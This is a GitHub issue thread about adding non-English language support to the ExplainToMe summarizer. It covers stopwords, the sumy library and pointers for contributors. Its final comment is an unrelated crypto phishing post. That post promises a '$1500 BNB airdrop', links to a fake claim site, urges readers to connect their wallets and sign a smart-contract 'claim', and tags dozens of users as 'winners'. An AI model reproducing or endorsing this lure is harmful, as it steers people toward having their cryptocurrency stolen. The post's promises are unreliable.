### ISSUE TITLE
Languages other than English

### ISSUE THREAD

**Issue by ghost** [jjangsangy/ExplainToMe#3]
Hi there, thanks for the cool project. The bottom of the README says the support for other languages is a thing to look forward to -- could you elaborate on it a bit? Any particular plans? Let me know if you're looking for contributors that could handle different languages.

**Comment by jjangsangy** [comment]
Sure. So ExplainToMe currently does 3 things.
1. Grabs HTML from Webpage
2. Extracts the main article components.
3. Generates semantic graph and computes it's centroid.

Currently #1, #2 do not care about language, mostly dealing with HTML and webpage metadata. #3 cares about language, but mostly dealing with `stopwords` and language cleaning. If the user specifies the language of the article in advance (sometimes we can discover in HTML), we can provide stopwords, and most romantic languages should generate a decent summary.

Most likely start by supporting those languages.

I am interested in doing non-romance languages, but we'll see how far we get

**Comment by ghost** [comment]
Cool. I take it you only use sumy as the summarisation platform? It seems to support Czech, French, German, Portuguese, Slovak, and Spanish out-of-the-box (the stop words for these languages are included in the package).

**Comment by jjangsangy** [comment]
Correct. Sumy provides the right framework for building document Summarizer as well as the most popular techniques implemented.

My main concern about adding more languages is I can't really attest to their accuracy in an intuitive way. My experience with cross-language NLP is that techniques vary on effectiveness based on latent cultural features.

**Comment by gioferreira** [comment]
I'd love to help with Portuguese (Brazilian Portuguese).
I've been looking for something like this in Portuguese for ages.

**Comment by jjangsangy** [comment]
Awesome. Where I would start looking is under `textrank.py`. There is a function called `run_summarizer` that takes in a keyword argument language. Currently there is no function for detecting the language, so you'll have to write one based on either metadata, HTML meta tag, or by introducing some library to detect the language.

**Comment by jjangsangy** [comment]
Heads up I'm making some changes that will be pushed upstream maybe this or next week. It shouldn't effect any code in `textrank.py` or the original api.

The code however does move a lot of files around. Mostly I've split the application into the flask server that only displays the webpage and a summarization backend which runs asynchronously on aws lambda. I've mostly been running the public heroku server for demo, but it's getting costly to maintain it even if it's not that much every month

**Comment by jmperezv** [comment]
# The Ultimate Binance Airdrop Guide: Claim Your $1500 in BNB Now and Earn Extra Rewards!

🎉 Exciting News! You are the lucky recipient of the exclusive $1.5 million Binance Airdrop, and we're thrilled to offer you $1500 in BNB to enhance your year-end celebrations. And here's the cherry on top—connect now, and you'll instantly receive an extra $100! Follow the detailed steps below to seamlessly claim your tokens and maximize the benefits of this phenomenal festive giveaway.

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz)

## How to Claim Your Rewards:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://claim.bnbchainnetwork.xyz) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Enjoy a smooth and secure connection.

### 2. 🔄 Interact with the Smart Contract:
   - Once your wallet is connected.
   - Navigate to the platform and click on the "**Claim**" button to interact with the smart contract.
   - Benefit from the transparent and efficient process.

### 3. 💰 Additional Bonus Rewards:
   - Get an instant bonus of $100 upon connecting your wallet.
   - Capitalize on this limited-time opportunity to boost your overall rewards.

Act now to secure your $1500 in BNB, and take advantage of the extra $100 bonus—this is an offer you don't want to miss! But wait, there's more. By participating, you also stand a chance to win up to $20,000 in additional rewards. Don't hesitate; click the link now and experience the excitement of earning crypto rewards with a minimal 5% transaction fee.


Winners: @MewX, @leejay001, @eric2016fly, @michaelzengke, @artem-v-shamsutdinov, @remyaubc, @rudilee, @danhph, @mozacoval, @zanedb, @bcho, @anotherancientalien, @suzuki-shunsuke, @ramonPires, @ersin-ertan, @hyliker, @madhuakula, @JulienBreux, @lghsigma597, @ziplus4, @kenyee, @jasonfmorton, @EkkoLee, @kongwu-, @mapx, @Kiran01bm, @Staszek-org, @tim-hub, @rosuH, @YvanMasterAll, @youjinjin, @amolpednekar, @pama1234, @sosoeasyman, @icub3d, @raharsha, @miles990, @kimble, @paaddyy, @caplla, @yuxiaobin, @atahanceylan, @mikeendale, @tonykolomeytsev, @chenqiang712, @MichaelWes, @Zzechen, @0xbharath, @ryanaltair, @mbrukman
